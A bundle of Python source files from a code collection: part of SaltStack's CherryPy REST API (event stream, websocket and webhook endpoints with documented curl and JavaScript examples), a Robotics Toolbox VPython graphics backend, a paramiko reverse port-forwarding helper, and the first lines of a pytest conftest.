'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronity into account when designing an application. Below are some
general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript appliction is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
logger.error('Import of cherrypy.cpstats failed. Possible '
'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
VPython.py
|
#!/usr/bin/env python
"""
@author Micah Huth
"""
import importlib
import threading
import glob
import os
import platform
import warnings
from time import perf_counter, sleep
import imageio
from roboticstoolbox.backends.Connector import Connector
_GraphicsCanvas3D = None
_GraphicsCanvas2D = None
_GraphicalRobot = None
close_localhost_session = None
try:
from roboticstoolbox.backends.VPython.canvas import GraphicsCanvas2D, GraphicsCanvas3D
from roboticstoolbox.backends.VPython.graphicalrobot import GraphicalRobot
except ImportError:
print(
'\nYou must install the VPython component of the toolbox, do: \n'
'pip install roboticstoolbox[vpython]\n\n')
class VPython(Connector): # pragma nocover
"""
Graphical backend using VPython
VPython is a Python API that connects to a JavaScript/WebGL 3D graphics
engine in a browser tab. It supports many 3D graphical primitives
including meshes, boxes, ellipsoids and lines. It can not render in
full color.
Example:
.. code-block:: python
:linenos:
import roboticstoolbox as rtb
robot = rtb.models.DH.Panda() # create a robot
pyplot = rtb.backends.VPython() # create a VPython backend
pyplot.add(robot) # add the robot to the backend
robot.q = robot.qz # set the robot configuration
pyplot.step() # update the backend and graphical view
:references:
- https://vpython.org
"""
# TODO be able to add ellipsoids (vellipse, fellipse)
# TODO be able add lines (for end-effector paths)
def __init__(self, **kwargs):
"""
Open a localhost session with no canvases
"""
super(VPython, self).__init__()
# Init vars
self.canvases = []
# 2D array of [is_3d, height, width, title, caption, grid] per canvas
self.canvas_settings = []
self.robots = []
self._recording = False
self._recording_thread = None
self._recording_fps = None
self._thread_lock = threading.Lock()
self.launch_options = kwargs # save launch options
self._create_empty_session()
def launch(
self, **kwargs):
"""
Launch a graphical backend in a browser tab
``env = launch(args)` create a 3D scene in a new browser tab as
defined by args, and returns a reference to the backend.
"""
# merge instantiation & launch options
args = {**self.launch_options, **kwargs}
is_3d = args.get('is_3d', True)
height = args.get('height', 500)
width = args.get('width', 888)
title = args.get('title', 'Robotics Toolbox for Python: VPython display')
caption = args.get('caption', '')
grid = args.get('grid', False)
g_col = args.get('g_col', None)
super().launch()
self.canvas_settings.append(
[is_3d, height, width, title, caption, grid, g_col])
# Create the canvas with the given information
if is_3d:
self.canvases.append(
GraphicsCanvas3D(height, width, title, caption,
grid, g_col))
else:
self.canvases.append(
GraphicsCanvas2D(height, width, title, caption,
grid, g_col))
def step(self, dt=None, id=None, q=None, fig_num=0):
"""
Update the graphical scene
:param id: The Identification of the robot to move. Can be either the
DHRobot or GraphicalRobot
:type id: :class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
:class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param q: The joint angles/configuration of the robot (Optional, if not
supplied will use the stored q values).
:type q: float ndarray(n)
:param fig_num: The canvas index to delete the robot from, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number of
canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.step(args)`` triggers an update of the 3D scene in the browser
window referenced by ``env``.
.. note::
- Each robot in the scene is updated based on
their control type (position, velocity, acceleration, or torque).
- Upon acting, the other three of the four control types will be
updated in the internal state of the robot object.
- The control type is defined by the robot object, and not all
robot objects support all control types.
- Execution is blocked for the specified interval
"""
super().step()
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If GraphicalRobot given
if isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
poses = id.fkine(q)
id.set_joint_poses(poses)
# If DHRobot is given (or equivalent)
else:
grpahical_dh_robot = None
# If no ID given, and there are robots available
if id is None and len(self.robots) > 0:
# Obtain the first one
grpahical_dh_robot = self.robots[0]
# If no ID, and no robots available
elif id is None:
print("No robot found")
return
else:
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].robot is id and \
self.canvases[fig_num].is_robot_in_canvas(
self.robots[i]):
grpahical_dh_robot = self.robots[i]
break
# If no graphical equivalent found, return
if grpahical_dh_robot is None:
print("No robot found")
return
# Set poses of graphical robot
poses = grpahical_dh_robot.fkine(q)
grpahical_dh_robot.set_joint_poses(poses)
if dt is not None:
sleep(dt)
def reset(self):
"""
Reset the graphical scene
``env.reset()`` triggers a reset of the 3D scene in the browser window
referenced by ``env``. It is restored to the original state defined by
``launch()``.
"""
super().reset()
if len(self.canvases) > 0:
# Clear localhost
self.canvases[0].scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
# Delete all sessions
self.canvases = []
self._create_empty_session()
for settings in self.canvas_settings:
# Create the canvas with the given information
if settings[0]:
self.canvases.append(GraphicsCanvas3D(
settings[1], settings[2], settings[3],
settings[4], settings[5]))
else:
self.canvases.append(GraphicsCanvas2D(
settings[1], settings[2], settings[3],
settings[4], settings[5]))
def restart(self):
"""
Restart the graphics display
``env.restart()`` triggers a restart of the browser view referenced by
``env``. It is closed and relaunched to the original state defined by
``launch()``.
"""
super().restart()
self.reset()
def close(self):
"""
Close the graphics display
``env.close()`` gracefully closes the browser tab browser view
referenced by ``env``.
"""
super().close()
# Close session
if len(self.canvases) > 0:
# if a canvas made
close_localhost_session(self.canvases[0])
else:
# No canvas, so make one
temp = GraphicsCanvas2D()
close_localhost_session(temp)
self.canvases = []
def add(self, dhrobot, fig_num=0, name=None, **kwargs):
"""
Add a robot to the graphical scene
:param dhrobot: The ``DHRobot`` object (if applicable)
:type dhrobot: class:`~roboticstoolbox.robot.DHRobot.DHRobot`, None
:param fig_num: The canvas number to place the robot in
:type fig_num: int
:param name: The name of the robot
:type name: `str`
:raises ValueError: Figure number must be between 0 and number of
figures created
:return: object id within visualizer
:rtype: int
``id = env.add(robot)`` adds the ``robot`` to the graphical
environment.
.. note::
- ``robot`` must be of an appropriate class.
- Adds the robot object to a list of robots which will be updated
when the ``step()`` method is called.
"""
# TODO - name can come from the robot object, maybe an override name?
# Micah: "Name is used from robot class, unless robot is not given"
# TODO - why dhrobot "if applicable"?
# Micah: "It's possible to create a graphical robot
# in VPython not using a robot class."
# TODO - what about other classes of robot?
# Micah: "I use specific parameters in dhrobots.
# If they exist in other robot classes, it should work."
# TODO - what about adding ellipsoids?
super().add()
if name is None:
name = dhrobot.name
# Sanity check input
if fig_num < 0 or fig_num > len(self.canvases) - 1:
raise ValueError(
"Figure number must be between 0 and number "
"of figures created")
# Add robot to canvas
self.robots.append(
GraphicalRobot(self.canvases[fig_num], name, dhrobot))
# self.canvases[fig_num].add_robot(self.robots[len(self.robots)-1])
def remove(self, id, fig_num=0):
"""
Remove a robot to the graphical scene
:param id: The id of the robot to remove. Can be either the DHLink or
GraphicalRobot
:type id: class:`~roboticstoolbox.robot.DHRobot.DHRobot`,
class:`roboticstoolbox.backends.VPython.graphics_robot.GraphicalRobot`
:param fig_num: The canvas index to delete the robot from, defaults to
the initial one
:type fig_num: int, optional
:raises ValueError: Figure number must be between 0 and total number
of canvases
:raises TypeError: Input must be a DHLink or GraphicalRobot
``env.remove(robot)`` removes the ``robot`` from the graphical
environment.
"""
super().remove()
if fig_num < 0 or fig_num >= len(self.canvases):
raise ValueError(
"Figure number must be between 0 and total number of canvases")
# If DHLink given
if isinstance(id, DHLink):
robot = None
# Find first occurrence of it that is in the correct canvas
for i in range(len(self.robots)):
if self.robots[i].seriallink.equal(id) and \
self.canvases[fig_num].is_robot_in(self.robots[i]):
robot = self.robots[i]
break
if robot is None:
return
else:
self.canvases[fig_num].delete_robot(robot)
# ElseIf GraphicalRobot given
elif isinstance(id, GraphicalRobot):
if self.canvases[fig_num].is_robot_in(id):
self.canvases[fig_num].delete_robot(id)
# Else
else:
raise TypeError("Input must be a DHLink or GraphicalRobot")
def hold(self): # pragma: no cover
'''
hold() keeps the tab open i.e. stops the tab from closing once
the main script has finished.
'''
while True:
pass
def _add_teach_panel(self):
# just need to change the display mode
self.canvases[0].teach_mode(True)
#
# Public non-standard methods
#
def record_start(self, fps, scene_num=0):
"""
Start recording screencaps of a scene
"""
self._thread_lock.acquire()
if not self._recording:
print("VPython Recording...")
if fps > 10:
warnings.warn("The chosen recording fps ({0}) could result in lagging video quality."
"Consider lowering fps and robot speed (e.g. 5fps)".format(fps), RuntimeWarning)
self._recording = True
self._recording_fps = fps
# Spawn a thread
self._recording_thread = threading.Thread(target=self._record_scene, args=(scene_num, fps,))
self._recording_thread.start()
self._thread_lock.release()
def record_stop(self, filename, save_fps=None):
"""
Stop recording screencaps of a scene and combine them into a movie
Save_fps is different to record fps. Will save the media file at the given save fps.
"""
#
self._thread_lock.acquire()
if self._recording:
self._recording = False
print("VPython Recording Stopped...")
print("VPython Recording Saving... DO NOT EXIT")
else:
self._thread_lock.release()
return
self._thread_lock.release()
# Wait for thread to finish
self._recording_thread.join()
sleep(3) # Quick sleep to ensure all downloads are done
# (higher framerates can lag behind)
# Get downloads directory
opsys = platform.system()
if opsys == 'Windows': # Windows
path_in = os.path.join(os.getenv('USERPROFILE'), 'downloads')
elif opsys == 'Linux' or opsys == 'Darwin': # Linux / Mac
path_in = os.path.join(os.getenv('HOME'), 'downloads')
else: # Undefined OS
# lets assume 'HOME' for now
path_in = os.path.join(os.getenv('HOME'), 'downloads')
fp_out = filename
fp_in = path_in + "/vpython_*.png"
files = [file for file in glob.glob(fp_in)]
if save_fps is None:
save_fps = self._recording_fps
writer = imageio.get_writer(fp_out, fps=save_fps)
for f in files:
writer.append_data(imageio.imread(f)) # Add it to the video
os.remove(f) # Clean up file
writer.close()
print("VPython Recording Saved... It is safe to exit")
#
# Private Methods
#
@staticmethod
def _create_empty_session():
"""
Create a canvas to ensure the localhost session has been opened.
Then clear the browser tab
"""
# Create a canvas to initiate the connection
temp = GraphicsCanvas3D()
# Delete the canvas to leave a blank screen
temp.scene.append_to_caption('''
<script type="text/javascript">
let gs = document.getElementById('glowscript');
gs.innerHTML = '';
</script>
''')
def _record_scene(self, scene_num, fps):
"""
Thread-called function to continuously record screenshots
"""
frame_num = 0
if fps <= 0:
raise ValueError("fps must be greater than 0.")
f = 1 / fps
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
while recording:
# Get current time
t_start = perf_counter()
# Take screenshot
filename = "vpython_{:04d}.png".format(frame_num)
self.canvases[scene_num].take_screenshot(filename)
frame_num += 1
# Get current time
t_stop = perf_counter()
# Wait for time of frame to finish
# If saving takes longer than frame frequency, this while is skipped
while t_stop - t_start < f:
t_stop = perf_counter()
self._thread_lock.acquire()
recording = self._recording
self._thread_lock.release()
|
tunneling.py
|
"""
This file provides remote port forwarding functionality using paramiko package,
Inspired by: https://github.com/paramiko/paramiko/blob/master/demos/rforward.py
"""
import select
import socket
import sys
import threading
from io import StringIO
import warnings
import paramiko
DEBUG_MODE = False
def handler(chan, host, port):
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
verbose("Forwarding request to {}:{} failed: {}".format(host, port, e))
return
verbose(
"Connected! Tunnel open {} -> {} -> {}".format(chan.origin_addr,
chan.getpeername(),
(host, port))
)
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
verbose("Tunnel closed from {}".format(chan.origin_addr,))
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward("", server_port)
while True:
chan = transport.accept(1000)
if chan is None:
continue
thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
thr.setDaemon(True)
thr.start()
def verbose(s):
if DEBUG_MODE:
print(s)
def create_tunnel(payload, local_server, local_server_port):
client = paramiko.SSHClient()
# client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.set_missing_host_key_policy(paramiko.WarningPolicy())
verbose(
"Connecting to ssh host {}:{} ...".format(payload["host"], int(payload[
"port"]))
)
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
client.connect(
hostname=payload["host"],
port=int(payload["port"]),
username=payload["user"],
pkey=paramiko.RSAKey.from_private_key(StringIO(payload["key"])),
)
except Exception as e:
print(
"*** Failed to connect to {}:{}: {}}".format(payload["host"],
int(payload["port"]), e)
)
sys.exit(1)
verbose(
"Now forwarding remote port {} to {}:{} ...".format(int(payload[
"remote_port"]),
local_server,
local_server_port)
)
thread = threading.Thread(
target=reverse_forward_tunnel,
args=(
int(payload["remote_port"]),
local_server,
local_server_port,
client.get_transport(),
),
daemon=True,
)
thread.start()
return payload["share_url"]
|
conftest.py
|
from multiprocessing import Process
import os
import signal
from time import sleep
from typing import List
import pytest
@pytest.fixture
def run_cli(capfd):
